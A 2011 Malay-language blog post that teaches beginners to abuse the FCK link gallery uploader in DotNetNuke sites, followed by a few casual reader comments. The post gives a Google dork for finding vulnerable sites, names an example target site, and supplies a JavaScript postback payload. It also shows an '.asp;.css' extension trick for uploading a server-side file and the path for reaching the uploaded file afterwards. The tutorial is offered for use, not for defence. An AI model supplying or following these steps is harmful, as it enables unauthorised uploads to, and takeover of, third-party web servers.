Friday 11 November 2011

FCK Link Gallery - File Uploader

Dork : inurl:fck/fcklinkgallery

Exploit 1 : providers/htmleditorproviders/fck/fcklinkgallery.aspx

Exploit 2 : javascript:__doPostBack('ctlURL$cmdUpload','')




1. Masukkan dork "inurl:fck/fcklinkgallery"

2. Cari target anda contoh "http://scfpd.org/providers/htmleditorproviders/fck/fcklinkgallery.aspx"


3. Pilih "File (A File On Your Site)"


4. Padam URL dan gantikan dengan exploit "javascript:__doPostBack('ctlURL$cmdUpload','')".
> Bagi pengguna Google Chrome perkataan "javascript:" haruslah ditaip secara manual.


5. Kemudian pilih "choose file" dan upload file html anda tetapi anda haruslah menggunakan extension seperti .css, seperti dalam tutorial ini saya menggunakan file yang telah saya tambah extension .css dihujungnya. "Muz_c0der.asp;.css"


6. Setelah selesai upload, anda boleh melihat hasilnya dengan memambahkan "portals/0/namafileanda" di hujung URL contoh seperti yang telah saya buat : "http://scfpd.org/portals/0/Muz_c0der.asp;.css"


7. Enjoy !!


Tunggukan POC seterusnya pada edisi akan datang...
Ini satu cara lama dan ramai sudah mengetahui...
So yang masta jangan baca khas untuk  NEWBIE sahaja...
Hehe... Sharing Is Caring...

3 comments:

Peguam Bisaya said...

suka oku mongoi blog mu ti mcm2 ada :)

Peguam Bisaya said...

suka oku mongoi blog mu ti mcm2 ada :)

Anonymous said...

@peGuaM_BiSaYa

aru nini ulun bisaya mongoi siti...hehe